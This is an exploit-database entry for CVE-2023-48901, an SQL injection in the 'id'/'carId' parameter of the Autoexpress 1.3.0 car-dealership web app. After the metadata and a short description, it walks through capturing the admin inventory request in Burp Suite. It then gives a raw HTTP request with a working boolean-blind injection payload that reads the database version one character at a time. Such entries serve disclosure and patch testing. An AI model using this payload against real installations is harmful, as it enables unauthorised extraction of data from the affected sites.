Share
## https://sploitus.com/exploit?id=1337DAY-ID-39473
# Exploit Title: tramyardg autoexpress - SQL Injection
# Exploit Author: Scott White
# Vendor Homepage: https://github.com/tramyardg/autoexpress
# Version: v1.3.0
# Tested on: Ubuntu 22.04.3 LTS + Apache/2.4.52
# CVE : CVE-2023-48901

# References:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-48901
https://www.cve.org/CVERecord?id=CVE-2023-48901

# Description:
Autoexpress 1.3.0 allows SQL Injection via parameter 'carId' in /autoexpress/details.php and /autoexpress/admin/inventory.php. This vulnerability allows remote attackers to disclose sensitive information on affected installations.

# Proof of Concept:
+ Go to "http://localhost/autoexpress/admin/sign-in.php"
+ Sign in with Admin credentials
+ Click "Manage Inventory" --> "Actions" --> "Manage Photos" while having the "Intercept On" Burp Suite
+ Should receive a request of POST - /autoexpress/admin/inventory.php?action=getPhotosByCarId&id=[ID]
+ Send it to Repeater
+ Captured Burp Request:

POST /autoexpress/admin/inventory.php?action=getPhotosByCarId&id=3 HTTP/1.1
Host: localhost
Content-Length: 0
Accept: application/json, text/javascript, */*; q=0.01
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
X-Requested-With: XMLHttpRequest
Origin: http://localhost
Referer: http://localhost/autoexpress/admin/inventory.php?username=admin
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=PHPSESSIONID
Connection: close

# Sample Request
POST /autoexpress/admin/inventory.php?action=getPhotosByCarId&id=3+and+(ascii(substring((select+version()),1,1)))+%3d+56 HTTP/1.1
Host: localhost
Content-Length: 0
Accept: application/json, text/javascript, */*; q=0.01
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
X-Requested-With: XMLHttpRequest
Origin: http://localhost
Referer: http://localhost/autoexpress/admin/inventory.php?username=admin
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=PHPSESSIONID
Connection: close